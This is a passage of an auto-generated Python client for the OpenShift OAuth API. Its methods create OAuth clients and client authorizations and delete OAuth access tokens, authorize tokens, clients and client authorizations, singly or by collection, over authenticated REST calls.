return self.create_oauth_openshift_io_v1_o_auth_client_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_client_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_client_with_http_info(self, body, **kwargs):
"""
create an OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClient body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClient
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_client`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClient',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_oauth_openshift_io_v1_o_auth_client_authorization(self, body, **kwargs):
"""
create an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client_authorization(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClientAuthorization body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(body, **kwargs)
else:
(data) = self.create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(body, **kwargs)
return data
def create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, body, **kwargs):
"""
create an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1OAuthClientAuthorization body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1OAuthClientAuthorization
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_oauth_openshift_io_v1_o_auth_client_authorization`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1OAuthClientAuthorization',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
    def delete_oauth_openshift_io_v1_collection_o_auth_access_token(self, **kwargs):
        """
        delete collection of OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_access_token(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(**kwargs)
        else:
            (data) = self.delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(**kwargs)
            return data

    def delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(self, **kwargs):
        """
        delete collection of OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_access_token_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_oauth_openshift_io_v1_collection_o_auth_access_token" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'field_selector' in params:
            query_params['fieldSelector'] = params['field_selector']
        if 'label_selector' in params:
            query_params['labelSelector'] = params['label_selector']
        if 'resource_version' in params:
            query_params['resourceVersion'] = params['resource_version']
        if 'timeout_seconds' in params:
            query_params['timeoutSeconds'] = params['timeout_seconds']
        if 'watch' in params:
            query_params['watch'] = params['watch']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def delete_oauth_openshift_io_v1_collection_o_auth_authorize_token(self, **kwargs):
        """
        delete collection of OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(**kwargs)
        else:
            (data) = self.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(**kwargs)
            return data

    def delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(self, **kwargs):
        """
        delete collection of OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_authorize_token_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_oauth_openshift_io_v1_collection_o_auth_authorize_token" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'field_selector' in params:
            query_params['fieldSelector'] = params['field_selector']
        if 'label_selector' in params:
            query_params['labelSelector'] = params['label_selector']
        if 'resource_version' in params:
            query_params['resourceVersion'] = params['resource_version']
        if 'timeout_seconds' in params:
            query_params['timeoutSeconds'] = params['timeout_seconds']
        if 'watch' in params:
            query_params['watch'] = params['watch']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def delete_oauth_openshift_io_v1_collection_o_auth_client(self, **kwargs):
        """
        delete collection of OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(**kwargs)
        else:
            (data) = self.delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(**kwargs)
            return data

    def delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(self, **kwargs):
        """
        delete collection of OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_oauth_openshift_io_v1_collection_o_auth_client" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclients'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'field_selector' in params:
            query_params['fieldSelector'] = params['field_selector']
        if 'label_selector' in params:
            query_params['labelSelector'] = params['label_selector']
        if 'resource_version' in params:
            query_params['resourceVersion'] = params['resource_version']
        if 'timeout_seconds' in params:
            query_params['timeoutSeconds'] = params['timeout_seconds']
        if 'watch' in params:
            query_params['watch'] = params['watch']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def delete_oauth_openshift_io_v1_collection_o_auth_client_authorization(self, **kwargs):
        """
        delete collection of OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(**kwargs)
        else:
            (data) = self.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(**kwargs)
            return data

    def delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(self, **kwargs):
        """
        delete collection of OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_oauth_openshift_io_v1_collection_o_auth_client_authorization" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'field_selector' in params:
            query_params['fieldSelector'] = params['field_selector']
        if 'label_selector' in params:
            query_params['labelSelector'] = params['label_selector']
        if 'resource_version' in params:
            query_params['resourceVersion'] = params['resource_version']
        if 'timeout_seconds' in params:
            query_params['timeoutSeconds'] = params['timeout_seconds']
        if 'watch' in params:
            query_params['watch'] = params['watch']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def delete_oauth_openshift_io_v1_o_auth_access_token(self, name, body, **kwargs):
        """
        delete an OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_o_auth_access_token(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
        else:
            (data) = self.delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
            return data

    def delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, body, **kwargs):
        """
        delete an OAuthAccessToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAccessToken (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_oauth_openshift_io_v1_o_auth_access_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_access_token`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_access_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'grace_period_seconds' in params:
            query_params['gracePeriodSeconds'] = params['grace_period_seconds']
        if 'orphan_dependents' in params:
            query_params['orphanDependents'] = params['orphan_dependents']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def delete_oauth_openshift_io_v1_o_auth_authorize_token(self, name, body, **kwargs):
        """
        delete an OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_o_auth_authorize_token(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAuthorizeToken (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
        else:
            (data) = self.delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
            return data

    def delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, body, **kwargs):
        """
        delete an OAuthAuthorizeToken
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthAuthorizeToken (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer; zero means delete immediately. If this value is nil, the default grace period for the specified type will be used.
        :param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_oauth_openshift_io_v1_o_auth_authorize_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_authorize_token`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_authorize_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'grace_period_seconds' in params:
            query_params['gracePeriodSeconds'] = params['grace_period_seconds']
        if 'orphan_dependents' in params:
            query_params['orphanDependents'] = params['orphan_dependents']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
    def delete_oauth_openshift_io_v1_o_auth_client(self, name, body, **kwargs):
        """
        delete an OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
